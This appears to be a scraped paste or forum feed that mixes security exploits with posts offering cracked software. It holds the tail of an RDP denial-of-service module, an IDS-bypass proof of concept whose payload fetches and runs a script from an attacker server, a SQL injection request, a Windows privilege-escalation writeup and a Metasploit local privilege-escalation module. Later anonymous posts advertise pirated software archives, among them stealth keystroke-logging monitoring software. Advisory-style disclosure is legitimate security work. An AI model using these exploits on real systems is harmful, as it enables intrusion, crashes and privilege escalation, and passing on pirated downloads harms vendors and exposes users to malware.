"\x01\x00\x03\x00\x00\x02\x00\x00\x00\x00\x1d\x04\x00\x00\x00\x00" + "\x00\x00\x00\x00" + "\x02\x00" + # capabilitySetType: 2 - TS_BITMAP_CAPABILITYSET "\x1c\x00" + # lengthCapability: 28 "\x20\x00\x01\x00\x01\x00\x01\x00\x80\x07\x38\x04\x00\x00\x01\x00" + "\x01\x00\x00\x1a\x01\x00\x00\x00" + "\x03\x00" + # capabilitySetType: 3 - TS_ORDER_CAPABILITYSET "\x58\x00" + # lengthCapability: 88 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x00\x00\xaa\x00" + "\x01\x01\x01\x01\x01\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\x01" + "\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x00\x00\x00\x00\x00" + "\xa1\x06\x06\x00\x00\x00\x00\x00\x00\x84\x03\x00\x00\x00\x00\x00" + "\xe4\x04\x00\x00\x13\x00\x28\x00\x03\x00\x00\x03\x78\x00\x00\x00" + "\x78\x00\x00\x00\xfc\x09\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x0a\x00" + # capabilitySetType: 10 - ?? "\x08\x00" + # lengthCapability: 8 "\x06\x00\x00\x00" + "\x07\x00" + # capabilitySetType: 7 - TSWINDOWACTIVATION_CAPABILITYSET "\x0c\x00" + # lengthCapability: 12 "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x05\x00" + # capabilitySetType: 5 - TS_CONTROL_CAPABILITYSET "\x0c\x00" + # lengthCapability: 12 "\x00\x00\x00\x00\x02\x00\x02\x00" + "\x08\x00" + # capabilitySetType: 8 - TS_POINTER_CAPABILITYSET "\x0a\x00" + # lengthCapability: 10 "\x01\x00\x14\x00\x15\x00" + "\x09\x00" + # capabilitySetType: 9 - TS_SHARE_CAPABILITYSET "\x08\x00" + # lengthCapability: 8 "\x00\x00\x00\x00" + "\x0d\x00" + # capabilitySetType: 13 - TS_INPUT_CAPABILITYSET "\x58\x00" + # lengthCapability: 88 "\x91\x00\x20\x00\x09\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00" + "\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00" + "\x0c\x00" + # capabilitySetType: 12 - TS_SOUND_CAPABILITYSET "\x08\x00" + # lengthCapability: 8 "\x01\x00\x00\x00" + "\x0e\x00" + # capabilitySetType: 14 - TS_FONT_CAPABILITYSET "\x08\x00" + # lengthCapability: 8 "\x01\x00\x00\x00" + "\x10\x00" + # capabilitySetType: 16 - TS_GLYPHCAChE_CAPABILITYSET "\x34\x00" + # lengthCapability: 52 "\xfe\x00\x04\x00\xfe\x00\x04\x00\xfe\x00\x08\x00\xfe\x00\x08\x00" + "\xfe\x00\x10\x00\xfe\x00\x20\x00\xfe\x00\x40\x00\xfe\x00\x80\x00" + "\xfe\x00\x00\x01\x40\x00\x00\x08\x00\x01\x00\x01\x03\x00\x00\x00" + "\x0f\x00" + # capabilitySetType: 15 - TS_BRUSH_CAPABILITYSET "\x08\x00" + # lengthCapability: 8 "\x01\x00\x00\x00" + "\x11\x00" + # capabilitySetType: ?? "\x0c\x00" + # lengthCapability: 12 "\x01\x00\x00\x00\x00\x28\x64\x00" + "\x14\x00" + # capabilitySetType: ?? "\x0c\x00" + # lengthCapability: 12 "\x01\x00\x00\x00\x00\x00\x00\x00" + "\x15\x00" + # capabilitySetType: ?? "\x0c\x00" + # lengthCapability: 12 "\x02\x00\x00\x00\x00\x0a\x00\x01" + "\x1a\x00" + # capabilitySetType: ?? "\x08\x00" + # lengthCapability: 8 "\xaf\x94\x00\x00" + "\x1c\x00" + # capabilitySetType: ?? "\x0c\x00" + # lengthCapability: 12 "\x12\x00\x00\x00\x00\x00\x00\x00" + "\x1b\x00" + # capabilitySetType: ?? "\x06\x00" + # lengthCapability: 6 "\x01\x00" + "\x1e\x00" + # capabilitySetType: ?? "\x08\x00" + # lengthCapability: 8 "\x01\x00\x00\x00" + "\x18\x00" + # capabilitySetType: ?? "\x0b\x00" + # lengthCapability: 11 "\x02\x00\x00\x00\x03\x0c\x00" + "\x1d\x00" + # capabilitySetType: ?? "\x5f\x00" + # lengthCapability: 95 "\x02\xb9\x1b\x8d\xca\x0f\x00\x4f\x15\x58\x9f\xae\x2d\x1a\x87\xe2" + "\xd6\x01\x03\x00\x01\x01\x03\xd4\xcc\x44\x27\x8a\x9d\x74\x4e\x80" + "\x3c\x0e\xcb\xee\xa1\x9c\x54\x05\x31\x00\x31\x00\x00\x00\x01\x00" + "\x00\x00\x25\x00\x00\x00\xc0\xcb\x08\x00\x00\x00\x01\x00\xc1\xcb" + "\x1d\x00\x00\x00\x01\xc0\xcf\x02\x00\x08\x00\x00\x01\x40\x00\x02" + "\x01\x01\x01\x00\x01\x40\x00\x02\x01\x01\x04" ## type = 0x13 = TS_PROTOCOL_VERSION | PDUTYPE_CONFIRMACTIVEPDU return(rdp_build_share_control_header(0x13, pdu)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/5186005a-36f5-4f5d-8c06-968f28e2d992 ## Client Synchronize - TS_SYNCHRONIZE_PDU - 2.2.1.19 / 2.2.14.1 def pdu_client_synchronize(target_user = 0) pdu = "\x01\x00" + # messageType: 1 SYNCMSGTYPE_SYNC [target_user].pack("S<") # targetUser, 16 bit, unsigned. ## pduType2 = 0x1f = 31 - PDUTYPE2_SCYNCHRONIZE data_header = rdp_build_share_data_header(0x1f, pdu) ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU return(rdp_build_share_control_header(0x17, data_header)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9d1e1e21-d8b4-4bfd-9caf-4b72ee91a7135 ## Control Cooperate - TC_CONTROL_PDU 2.2.1.15 def pdu_client_control_cooperate() pdu = "\x04\x00" + # action: 4 - CTRLACTION_COOPERATE "\x00\x00" + # grantId: 0 "\x00\x00\x00\x00" # controlId: 0 ## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL data_header = rdp_build_share_data_header(0x14, pdu) ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU return(rdp_build_share_control_header(0x17, data_header)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4f94e123-970b-4242-8cf6-39820d8e3d35 ## Control Request - TC_CONTROL_PDU 2.2.1.16 def pdu_client_control_request() pdu = "\x01\x00" + # action: 1 - CTRLACTION_REQUEST_CONTROL "\x00\x00" + # grantId: 0 "\x00\x00\x00\x00" # controlId: 0 ## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL data_header = rdp_build_share_data_header(0x14, pdu) ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU return(rdp_build_share_control_header(0x17, data_header)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/ff7f06f8-0dcf-4c8d-be1f-596ae60c4396 ## Client Input Event Data - TS_INPUT_PDU_DATA - 2.2.8.1.1.3.1 def pdu_client_input_event_sychronize() pdu = "\x01\x00" + # numEvents: 1 "\x00\x00" + # pad2Octets "\x00\x00\x00\x00" + # eventTime "\x00\x00" + # messageType: 0 - INPUT_EVENT_SYNC ## TS_SYNC_EVENT 202.8.1.1.3.1.1.5 "\x00\x00" + # pad2Octets "\x00\x00\x00\x00" # toggleFlags ## pduType2 = 0x1c = 28 - PDUTYPE2_INPUT data_header = rdp_build_share_data_header(0x1c, pdu) ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU return(rdp_build_share_control_header(0x17, data_header)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7067da0d-e318-4464-88e8-b11509cf0bd9 ## Client Font List - TS_FONT_LIST_PDU - 2.2.1.18 def pdu_client_font_list() pdu = "\x00\x00" + # numberFonts: 0 "\x00\x00" + # totalNumberFonts: 0 "\x03\x00" + # listFlags: 3 (FONTLIST_FIRST | FONTLIST_LAST) "\x32\x00" # entrySize: 50 ## pduType2 = 0x27 = 29 - PDUTYPE2_FONTLIST data_header = rdp_build_share_data_header(0x27, pdu) ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU return(rdp_build_share_control_header(0x17, data_header)) end # ------------------------------------------------------------------------- # def crash_test(rc4enckey, hmackey) begin received = "" for i in 0..5 received += rdp_recv() end rescue RdpCommunicationError # we don't care end vprint_status("Sending DoS payload") found = false for j in 0..15 ## x86_payload: rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, ["00000000020000000000000"].pack("H*")), rc4enckey, hmackey, "\x03\xef")) ## x64_payload: rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, ["00000000000000000200000"].pack("H*")), rc4enckey, hmackey, "\x03\xef")) end end def produce_dos() unless(rdp_connection_initiation()) vprint_status("Could not connect to RDP.") return(false) end vprint_status("Sending initial client data") received = rdp_sendrecv(pdu_connect_initial(RDPConstants::PROTOCOL_RDP, datastore['RDP_CLIENT_NAME'])) rsmod, rsexp, rsran, server_rand, bitlen = rdp_parse_connect_response(received) vprint_status("Sending erect domain request") rdp_send(pdu_erect_domain_request()) vprint_status("Sending attach user request") received = rdp_sendrecv(pdu_attach_user_request()) user1 = received[9, 2].unpack("n").first [1003, 1004, 1005, 1006, 1007].each do | chan | rdp_sendrecv(pdu_channel_request(user1, chan)) end ## 5.3.4 Client Random Value client_rand = '' 32.times { client_rand << rand(0..255) } rcran = bytes_to_bignum(client_rand) vprint_status("Sending security exchange PDU") rdp_send(pdu_security_exchange(rcran, rsexp, rsmod, bitlen)) ## We aren't decrypting anything at this point. Leave the variables here ## to make it easier to understand in the future. rc4encstart, rc4decstart, hmackey, sessblob = rdp_calculate_rc4_keys(client_rand, server_rand) vprint_status("RC4_ENC_KEY: #{bin_to_hex(rc4encstart)}") vprint_status("RC4_DEC_KEY: #{bin_to_hex(rc4decstart)}") vprint_status("HMAC_KEY: #{bin_to_hex(hmackey)}") vprint_status("SESS_BLOB: #{bin_to_hex(sessblob)}") rc4enckey = RC4.new(rc4encstart) vprint_status("Sending client info PDU") # TODO pdu = pdu_client_info(datastore['RDP_USER'], datastore['RDP_DOMAIN'], datastore['RDP_CLIENT_IP']) received = rdp_sendrecv(rdp_build_pkt(pdu, rc4enckey, hmackey, "\x03\xeb", true)) vprint_status("Received License packet") rdp_recv() vprint_status("Sending client confirm active PDU") rdp_send(rdp_build_pkt(pdu_client_confirm_active(), rc4enckey, hmackey)) vprint_status("Sending client synchronize PDU") rdp_send(rdp_build_pkt(pdu_client_synchronize(1009), rc4enckey, hmackey)) vprint_status("Sending client control cooperate PDU") rdp_send(rdp_build_pkt(pdu_client_control_cooperate(), rc4enckey, hmackey)) vprint_status("Sending client control request control PDU") rdp_send(rdp_build_pkt(pdu_client_control_request(), rc4enckey, hmackey)) vprint_status("Sending client input sychronize PDU") rdp_send(rdp_build_pkt(pdu_client_input_event_sychronize(), rc4enckey, hmackey)) vprint_status("Sending client font list PDU") rdp_send(rdp_build_pkt(pdu_client_font_list(), rc4enckey, hmackey)) vprint_status("Sending close mst120 PDU") crash_test(rc4enckey, hmackey) vprint_status("Sending client disconnection PDU") rdp_send(rdp_build_data_tpdu("\x21\x80")) return(true) end # ------------------------------------------------------------------------- # def run_host(ip) ## Allow the run command to call the check command. begin if(open_connection()) status = produce_dos() end rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e bt = e.backtrace.join("\n") vprint_error("Unexpected error: #{e.message}") vprint_line(bt) elog("#{e.message}\n#{bt}") rescue RdpCommunicationError => e vprint_error("Error communicating RDP protocol.") status = Exploit::CheckCode::Unknown rescue Errno::ECONNRESET => e # NLA? vprint_error("Connection reset, possible NLA is enabled.") rescue => e bt = e.backtrace.join("\n") vprint_error("Unexpected error: #{e.message}") vprint_line(bt) elog("#{e.message}\n#{bt}") ensure if(status == true) sleep(1) unless(open_connection()) print_good("The host is crashed!") else print_bad("The DoS has been sent but the host is already connected!") end end disconnect() end end end
  3. [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DEEP-DISCOVERY-INSPECTOR-PERCENT-ENCODING-IDS-BYPASS.txt [+] ISR: Apparition Security [Vendor] www.trendmicro.com [Product] Deep Discovery Inspector Deep Discovery Inspector is a network appliance that monitors all ports and over 105 different network protocols to discover advanced threats and targeted attacks moving in and out of the network and laterally across it. The appliance detects and analyzes malware, command-and-control (C&C) communications, and evasive attacker activities that are invisible to standard security defenses. [Vulnerability Type] Percent Encoding IDS Bypass [CVE Reference] Vendor decided not to release a CVE [Security Issue] Trend Micro Deep Discovery Inspector IDS will typically trigger alerts for malicious system commands like "Wget Commandline Injection" and they will be flagged as high. Attacker payloads sent with normal ascii characters for example like "wget" or even if they have been HEX encoded like "\x77\x67\x65\x74" they will still get flagged and alerted on. However, attackers can easily bypass these alerts by sending malicious commands in HEX preceded by percent sign chars "%", e.g. "%77%67%65%74" which also translates to "wget" and will not get flagged or alerted on and may still be processed on the target system. e.g. DDI RULE 2452 https://www.trendmicro.com/vinfo/us/threat-encyclopedia/network/ddi-rule-2452 Therefore, Trend Micro IDS alerts can be easily bypassed and the payload is still run by the vulnerable target if the payload is encoded using percent/hex encoding like %77%67%65%74. That will not only bypass the IDE by having no alert triggered or notification sent but the application will still process the malicious command. Importantly, the "wget" DDI Rule 2452 used is just an example and can potentially be any malicious request where the IDS checks the character encodings but fails to account for percent encoded HEX character payload values. [Exploit/POC] from socket import * #Bypass TM DDI IDS e.g. Rule 2452 (Wget command line injection) PoC #Discovery: hyp3rlinx - ApparitionSec #Apparition Security #Firewall Rule Bypass IP = raw_input("[+] Trend Micro IDS") PORT = 80 payload="/index.php?s=/index/vulnerable/app/invoke&function=call_user_func_array&vars[0]=system&vars[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a" req = "GET "+payload+" HTTP/1.1\r\nHost"+IP+"\r\nConnection: close\r\n\r\n" s=socket(AF_INET, SOCK_STREAM) s.connect((IP, PORT)) s.send(req) res="" while True: res = s.recv(512) print res if res=="\n" or "</html>": break s.close() #Result is 200 HTTP OK and code execution on vuln app and No IDS Alert gets triggered. [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: May 14, 2019 Vendor confirmed the IDS Bypass: May 20, 2019 Vendor informed that a DDI IDS enhancement has been made: July 18, 2019 July 23, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  4. # Exploit Title: NoviSmart CMS SQL injection # Date: 23.7.2019. # Exploit Author: n1x_ [MS-WEB] # Vendor Homepage: http://www.novismart.com/ # Version: Every version # CVE : CWE-89 Vulnerable parameter: Referer (HTTP Header field) [GET Request] GET / HTTP/1.1 Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Client-IP: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Forwarded-Host: localhost Accept-Language: en Via: 1.1 wa.www.test.com Origin: http://www.test.com/ X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=24769012200df6ccd9002dbf5b978e9c; language=1 Host: host Connection: Keep-alive Accept-Encoding: gzip,deflate Accept: */*
  5. Windows: RPCSS Activation Kernel Security Callback EoP Platform: Windows 10 1903/1809 (not tested earlier) Class: Elevation of Privilege Security Boundary (per Windows Security Service Criteria): User boundary Summary: The RPCSS Activation Kernel RPC server’s security callback can be bypassed resulting in EoP. Description: The RPCSS service is split into two components, RPCSS which runs as a low-privileged service account and the DCOM launch service which runs as SYSTEM and is responsible for creating new COM processes. Communication between the two services is over an RPC service named Activation Kernel (actkernel). When RPCSS receives a DCOM activation request it will pass that request on to the actkernel service to create new processes. The actkernel RPC service implements various privileged operations, therefore it shouldn’t be callable from a normal user account. However the service must know who made the activation request to RPCSS. This is acheived by RPCSS impersonating the activator while making the RPC request to actkernel which means the ALPC port used by actkernel must be accessible by any process capable of activating a DCOM object, including AC and LPAC. To limit the call to only RPCSS the service implements a security callback on the RPC server which checks the caller process ID the RPCSS service, this should block arbitrary users on the system calling the service. Unfortunately there’s a flaw in this design, RPC defaults to caching the results on these security checks and actkernel doesn’t disable this feature. What this means is once a call is made to actkernel from RPCSS with a user’s token the security result is cached. Now that same user can access actkernel directly as the security callback will not be made and the PID will not be checked. The caching is done primarily on the token’s modified ID, which doesn’t change as often as you’d expect including across ALPC impersonation. As long as the user has made some activation request (such as creating an OOP COM server) then the result is cached and the process can access privileged operations. Looking at what the service exposes an AC sandbox escape might be the best approach. For example the service exposes PrivGetPsmToken which will set an arbitrary SYSAPPID value to a token and return it to the caller. If done from an AC this token is still an AC token in the original package, but with an arbitrary SYSAPPID set which means that security checks which rely on that value can be bypassed. As the AC sid isn’t changed this means it can be impersonated by the caller. This could allow sandbox escape via Browser Broker or Desktop Broker by pretending to be Edge or a side-loaded application. Fixing wise if performance is acceptable then setting the RPC_IF_SEC_NO_CACHE flag on the interface registration should ensure the security callback is always made. You’d probably want to do a search for similar interfaces on Windows. Actkernel might be special in doing a PID check and allowing arbitrary callers via another route but I can’t be sure it’s the only one. Proof of Concept: I’ve provided a PoC as a C# project. It will use the vulnerability to get a token with an arbitrary SYSAPPID. It first respawns the PoC as the calculator AC, then gets a token for MicrosoftEdge. It doesn’t attempt to escape the sandbox, but I’m confident it’d be possible to achieve. 1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build. 2) As a normal user run the PoC. 3) The PoC should print the subkeys of the SAM hive. Expected Result: Accessing the actkernel RPC service should fail with an RPC fault. Observed Result: The actkernel RPC service grants access Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47135.zip
  6. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Exploit::EXE include Post::File include Post::Windows::Priv include Post::Windows::FileInfo include Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'AppXSvc Hard Link Privilege Escalation', 'Description' => %q( There exists a privilege escalation vulnerability for Windows 10 builds prior to build 17763. Due to the AppXSvc's improper handling of hard links, a user can gain full privileges over a SYSTEM-owned file. The user can then utilize the new file to execute code as SYSTEM. This module employs a technique using the Diagnostics Hub Standard Collector Service (DiagHub) which was discovered by James Forshaw to load and execute a DLL as SYSTEM. ), 'License' => MSF_LICENSE, 'Author' => [ 'Nabeel Ahmed', # Vulnerability discovery and PoC 'James Forshaw', # Code creating hard links and communicating with DiagHub service 'Shelby Pace' # Metasploit module ], 'References' => [ [ 'CVE', '2019-0841' ], [ 'URL', 'https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/' ], [ 'URL', 'https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html' ], [ 'URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html' ], [ 'URL', 'https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html' ] ], 'Targets' => [ [ 'Windows 10', { 'Platform' => 'win' } ] ], 'DisclosureDate' => '2019-04-09', 'DefaultTarget' => 0 )) end def check return CheckCode::Unknown if sysinfo['OS'] !~ /windows\s10/i path = expand_path('%WINDIR%\\system32\\win32k.sys') major, minor, build, revision, brand = file_version(path) return CheckCode::Appears if build < 17763 CheckCode::Detected end def upload_file(file_name, file_path) contents = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-0841', file_name)) write_file(file_path, contents) register_file_for_cleanup(file_path) rescue fail_with(Failure::UnexpectedReply, 'Failed to write file contents to target') end def init_process print_status("Attempting to launch Microsoft Edge minimized.") cmd_exec("cmd.exe /c start /min microsoft-edge:", nil, 30) end def mk_hard_link(src, target, link_exe) out = cmd_exec("cmd.exe /c #{link_exe} \"#{src}\" \"#{target}\"") return (out && out.include?('Done')) end def write_payload print_status('Writing the payload to disk') code = generate_payload_dll @original_data = read_file(@rtf_path) write_file(@rtf_path, code) end def exploit vuln_status = check fail_with(Failure::NotVulnerable, 'Failed to detect Windows 10') if vuln_status == CheckCode::Unknown fail_with(Failure::None, 'Already running with SYSTEM privileges') if is_system? cmd_exec("taskkill /F /IM MicrosoftEdge.exe /FI \"STATUS eq RUNNING\"") dat_path = expand_path("%USERPROFILE%\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\Settings.dat") fail_with(Failure::NotFound, 'Path does not exist') unless exist?(dat_path) if session.arch == ARCH_X86 exe_name = 'CVE-2019-0841_x86.exe' f_name = 'diaghub_load_x86.exe' elsif session.arch == ARCH_X64 exe_name = 'CVE-2019-0841_x64.exe' f_name = 'diaghub_load_x64.exe' end link_file_name = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(6...8)}.exe") upload_file(exe_name, link_file_name) @rtf_path = expand_path('%WINDIR%\\system32\\license.rtf') fail_with(Failure::UnexpectedReply, 'Did not retrieve expected output') unless mk_hard_link(dat_path, @rtf_path, link_file_name) print_good('Successfully created hard link') init_process cmd_exec("taskkill /F /IM MicrosoftEdge.exe") write_payload diaghub_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(8..12)}") upload_file(f_name, diaghub_path) cmd = "\"#{diaghub_path}\" \"license.rtf\"" cmd_exec(cmd) end def cleanup folder_path = expand_path("%TEMP%\\etw") dir_rm(folder_path) write_file(@rtf_path, @original_data) super end end
  7. Anonymous

    Kerish Doctor 2019 cracked

    What is Kerish Doctor 2019? Kerish Doctor 2019 is a complete solution for the automatic maintenance of Windows-based computers. The program will prevent crashes, fix system errors, clear away digital "trash", and optimize and protect your computer. Kerish Doctor 2019 is completely easy to use and can run on full autopilot. It is suitable for both beginners and experienced users. Why do I need Kerish Doctor 2019? It will boost your computer's speed up to 50%. You will notice a marked acceleration in the speed of your computer and its response time. Clean up to 500 MB of garbage per day. It's the most advanced way to clean your computer of all sorts of accumulated digital "trash". Reduce the risk of crashes by up to 30%. Our system registry error correction and crash prevention system reduces the likelihood of problems. Kerish.Doctor.2019.4.75.Retail.zip
  8. Anonymous

    Aomei Backupper 5.0.0

    Aomei Backupper Standard is an extremely simple backup software that includes basic and advanced features to ensure the safety of your system and data. The backup tools provided by this utility are important and essential for rescuing your system from failure or data loss. With Aomei Backupper Standard you will be able to create a system image to keep Windows and your applications safe, backup of the entire hard disk, specified partitions, or just to clone them. You can also easily backup your most important files and folders on a regular basis via automatic, incremental, and differential backups. Aomei Backupper Standard Features: Files/Folders Backup - Securely back up individual files and folders, such as email, photos, videos, documents, games, and programs. Also, it supports backing up files from one network/NAS to another. System Backup - One-click system drive backup of all contents, including Windows operating system, installed applications and custom settings without interrupting your work. Disk Backup - Backup your hard disk drives, including basic disk, dynamic disk, MBR disk, GPT disk, external disk, USB flash drive and other storage devices that can be recognized by Windows. Partition Backup - If you just want to backup one or more specified partitions or dynamic volumes, not entire disk. This free backup software allows you to back up partitions or dynamic volumes to a compressed image file. Version History for Aomei Backupper Standard : http://www.backup-utility.com/new-features.html Limitations: The free version includes the above features. Prices start at $54.95 and include: Faster backups System clone Universal restore Command line utility Merge backup images Split backup images Backup disk space management PXE Boot Tool Real-time sync files/folders Event-triggered schedule backups Edit the partitions on the disk File filter settings Restore files with NTFS permissions Backup and restore dynamic disk volumes Backup to CD/DVD Image deploy tool Provide charged technical service to clients with unlimited usage Support Windows Server 2003, 2008 (R2), 2012 (R2), 2016 SBS 2003, 2008, 2011 And more AOMEI Backupper 5.0.0.rar
  9. Anonymous

    Auslogics Disk Defrag Pro 9.0.0

    What does Disk Defrag Ultimate do? The problem: You may be experiencing longer application startup times or a general slowdown and believe disk fragmentation may be behind it. You want more than just a simple defrag to ensure your drives' optimal performance. The solution: Disk Defrag Ultimate lets you defrag files that are inaccessible during system operation, as well as optimize file placement on your hard drive to ensure faster access and most efficient operation. The multiple scheduling options let you easily maintain consistently high HDD speed. Auslogics.Disk.Defrag.Pro 9.0.0.rar
  10. Anonymous

    HomeGuard Professional Edition 7.7.1

    Granted, in the vast majority of cases, your employees are very likely to goof off watching videos on YouTube or sharing images from Reddit or Imgur. Without denying that small breaks are advisable, sometimes these activities can lead to a loss of productivity or worse, a costly harassment lawsuit from staff members who feel offended by the content shared on the company's PCs. HomeGuard Pro is a lightweight piece of software that allows you to monitor and manage the use of computers in a network in stealth mode and without the possibility to be bypassed by proxies. Enables you to records everything to the very detail The highlight of the application stems from the wide variety of elements it can record and this includes private chat messages between employees, emails sent and received, USB devices connected, bandwidth use, mouse clicks and the keystrokes typed in each program. Moreover, it takes random snapshots of the desktop that you can check out when you are short on time. You should know that the program does not need too much configuration and that it stores all of the aforementioned types of data by default. In case you want to want to block content and website usage, then you can easily do so by accessing the Settings. Helps you monitor computer usage remotely A further noteworthy feature of the utility is that you can view the records on all computer in the network remotely, so you do not have to access employees PCs at all. In fact, the app keeps main logs that are automatically synchronized with the ones on the other computers. In case you are worried about their size or about them being accessed and modified, then you can rest assured that they are stored compressed and come with 256-bit strong encryption. Last, but not least important, the tool works in stealth mode and cannot be bypassed using proxy servers. Despite the fact that the users cannot close or uninstall it, you can set the app to display warnings when they are attempting to access web content or local files that are blocked. A monitoring tool that keeps you on top of every situation In the eventuality that you want to come up with an effective strategy to boost performance in your company, but you cannot pinpoint the cause of low productivity, then HomeGuard Pro might be the tool you need to help you identify sources to improve or eliminate. HomeGuard Professional Edition 7.7.1.rar
  11. Anonymous

    Driver Reviver 5.29.0.8 x86 and x64

    Driver Reviver will scan your PC to identify out of date drivers. Driver Reviver can quickly and easily update these drivers to restore optimum performance to your PC and its hardware and extend its life. Ensures your PC hardware is performing at optimum levels By keeping your drivers updated, you are ensuring that you continue receiving updates containing bug fixes, performance improvements, and potential new features from the manufacturer. Eliminates the risk of downloading a faulty or infected driver Installing the wrong Driver or malware could render your PC inoperable and potentially put you at risk. Driver Reviver ensures accurate detection and consistently delivers the correct drivers. Saves you time It can take numerous hours to track down each Driver for each single piece of hardware connected to your PC. Driver Reviver accomplishes this in minutes through a quick scan and update process. Safe and Easy to Use Driver Reviver is unbelievably easy and quick to use and include safety features like automatic backups, restore wizard, exclusions, scheduler and more to keep your computer in good shape. Driver.Reviver.5.29.0.8.7z
  12. Anonymous

    Windows 10 Manager 3.1.0

    The complete solution to optimize, tweak, repair and clean up Windows 10Windows 10 Manager is an all-in-one utility for Microsoft Windows 10 specially, it includes over forty different utilities to optimize, tweak, clean up, speed up and repair your Windows 10, helps make your system perform faster, eliminate system fault, increase stability and security, personalize your copy of Windows 10, it can meet all of your expectations. Windows 10 Manager Features : Information Optimizer Cleaner Customization Security Network Misc. Utilities Information Creates the system restore point manually; Gets detailed information about your system and hardware, helps you find out the Microsoft product key such as Microsoft Windows and Microsoft Office; Shows and manages all running processes and threads; Repair Center helps to diagnose and fix the various system problems; Cleans up your system just one clicking; Optimization Wizard is useful to the user who is unfamiliar with computers. Optimizer Tweaks your system to improve performance and increase speed; Manages and configures the Windows boot menu to your preference; Startup Manager controls all the started programs with Windows start, checks and repairs the advanced starup items to restore the malicious change by viruses; Manages and optimizes system services and drivers to improve performance; Manages and optimizes the scheduled tasks to speed up your system. Cleaner Disk Analyzer can analyze and view the disk space usage of all programs, files and folders find out which engross your disk space and shown with a chart; Cleans up WinSxS folder securely to reduce the component store size; Smart Uninstaller can fully delete programs from your system without residual files and Registry entries; Helps you to uninstall cleanly the Windows apps from your computer; Desktop Cleaner can analyze and move unused shortcuts, files and folders on desktop to specified folders; Searches and deletes junk files to save disk space and improve performance; Searches and deletes the duplicated files to save your disk space; Registry Cleaner searches Registry to find out and delete the invalid items; Registry Defrag rebuilds and re-indexes your Registry to reduce registry access time and therefore improve application responsiveness and eliminate mistakes and corruption in Registry. Customization Customizes system parameters according to your preferences by tweaking File Explorer, Desktop, Start, Taskbar and Notification area; Adds files, folders and system items to This PC, and Desktop; Pins the files or folders to your Desktop, Taskbar or Start; Creates the quick startup items for jumplist on Taskbar; Manages the context menu when right click the file, folder, etc; Edits the shortcut menu that right-click Start button (Win + X shortcut); Customizes the look of your system; Edits and adds the shortcuts that executed on Run dialog box; Tweaks the Windows Apps and Microsoft Modern UI settings. Security Tweaks system, components, UAC, Sign in settings, adjusts various settings and restricts access to drives and programs to improve system security; 